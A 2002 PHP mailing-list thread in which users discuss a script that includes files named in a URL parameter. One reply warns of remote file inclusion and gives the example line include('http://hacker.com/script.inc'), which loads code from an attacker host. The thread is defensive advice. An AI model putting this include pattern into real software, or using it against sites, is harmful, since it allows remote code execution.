erm......would that alow hackers access? Say I have a database include file
would hackers be able to get access to my database like this?
(include('http://mysite.com/datainc.php');)
I hope bloody not!!! if so how on earth do i get round that!
John
On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote:
> Use realpath() to check the path. I also suspect your script is
> vulnarable to cross-site includes
> (include('http://hacker.com/script.inc');)
>
> Rick Beckman wrote:
> >Okay, I was mistaken... There is a gaping security hole in my simple li'l
> >script... How do I modify it to only accept files from a certain path? I
> >want the url format to be script.php?call=1 where "1" is the called file
> > in the /includes/ directory. Just when I get optimistic I leave the
> > entire system exposed. Yeah, that fits with my luck. :-)
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
